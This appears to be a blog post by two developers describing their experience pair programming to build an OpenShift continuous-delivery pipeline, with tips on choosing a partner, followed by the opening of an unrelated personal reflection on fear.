Two heads are better than one. Often, the part of development that takes the longest or is the most complicated isn’t writing the code – it’s figuring out what to do, and then figuring out what you did to break it and how to fix it.

Having a person there who understands the project as well as you do can speed up…well, literally all of that.

Higher Quality

…virtually all the surveyed professional programmers stated that they were more confident in their solutions when they pair programmed.

Pair programming provides better quality, hands down. We talked about this some already – a pair programmer can catch bugs before compiling or unit tests can, and they can catch bugs all the way from a typo to an architecture or design problem. Pair programming also, by its very nature, requires discussing all decisions – both design and implementation, at least at a high level.

…basically, you end up with an application where there’s been a design and code review for literally every aspect of the application.

Resilient Programming FTW (or, You Can Still Make Progress Even when Your Computer Dies)

We both had some laptop issues in all of this – Laine had some battery issues, and Josh had his laptop start a virus scan (slowing his computer to the point of being unusable) while he was trying to code. We got on Slack and helped the one who still had a working laptop, rather than that time just…being wasted.

Relationships, and Joy

…more than 90% stated that they enjoyed collaborative programming more than solo programming.

Best nerd celebration emoji.

Laughing at mistakes, getting encouragement (or trolling) when we did dumb stuff, nerd emoji celebration when something went well – all of these were better because we were working together.

It was just…fun. There was joy in all of it, in both the successes and the failures. And there was joy in the shared purpose of setting something that we loved up for success.

When making a pair…

There are a few things we learned that were vital to pair programming going well for us. We think that the following pieces are the most important to a successful pairing:

Trust

Without trust, you lose some of the benefit of pointing out mistakes and instead spend the time you’d gain making sure that feelings aren’t hurt. Based on our experience, we actually think that this one is the most important key to success.

Temperament

You’ll want to find someone with approximately the same temperament and, uh…bossy-ness. We went with Bossy-ness Level: Maximum, but you do you. We both push for what we think is the right solution, and we kind of enjoy arguing with each other to figure out whose solution really is right. If either of us had paired with someone who was uncomfortable with conflict, chances are it…wouldn’t have gone well.

Technical Level/Skill/Experience

Pair programming probably isn’t going to work very well with a brand new associate paired up with someone who’s been in the industry for 10 years. That’s a lot of context to explain, so while this setup is amazing for training purposes, it isn’t the most effective for software delivery.

Lack of Knowledge

Look for someone who knows something you don’t about what you’re trying to accomplish. Laine knew Jenkins and is a Google savant, and Josh knew the OpenShift theory and reads constantly – when automating releases to OpenShift, it was a good combination.

And Finally

Pair programming provides a ton of value. It speeds up development, catches bugs sooner, and aids dramatically in design and implementation. It’s also fun, which is important and sometimes forgotten in the “just deliver more” world of IT.

We loved working together on this, which led to much joy in learning the deep knowledge necessary to build a pipeline the whole company could use. And, even better, it worked – teams that joined OpenShift used and improved upon what we did, and those teams implemented continuous delivery on OpenShift. We’re both very sure that we never would have been that successful if we hadn’t paired up on it.

There’s No Absence of Fear

I used to think there was an emotional state of “no fear.” Entirely unafraid, about all things, all the time. I thought this was a real, legitimate place I should be trying to get to.

Laine (and God (L: it was mostly God…)) corrected me.

There are always new sources of fear. This world is broken. The people living here are broken. Things go wrong. Our dreams fail, and our hopes die. Our relationships can break, our jobs can suck, people can hurt us. We make choices and the people we love make choices, and it doesn’t always seem like it could possibly work out.
